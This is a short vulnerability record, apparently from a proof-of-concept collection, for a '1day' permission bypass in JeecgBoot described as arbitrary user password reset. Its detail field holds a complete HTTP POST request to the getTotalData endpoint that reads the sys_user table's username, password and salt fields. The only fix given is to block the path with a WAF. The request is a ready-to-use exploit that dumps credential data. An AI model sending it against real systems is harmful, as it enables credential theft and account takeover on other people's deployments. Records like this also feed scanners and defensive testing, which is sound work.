vendor = "JeecgBoot"
name = "JeecgBoot getTotalData任意用户密码重置"
type = "权限绕过"
version = "未知"
path = "/jeecg-boot/drag/onlDragDatasetHead/getTotalData"
detail = "POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {\"tableName\": \"sys_user\", \"compName\": \"test\", \"condition\": {\"filter\": {}}, \"config\": {\"assistValue\": [], \"assistType\": [], \"name\": [{\"fieldName\": \"username,password,salt\", \"fieldType\": \"string\"}, {\"fieldName\": \"id\", \"fieldType\": \"string\"}], \"value\": [{\"fieldName\": \"id\", \"fieldType\": \"string\"}], \"type\": []}}"
fix = "使用WAF封禁该地址"
date = "0711"
label = "1day"
verifier = "AdySec"
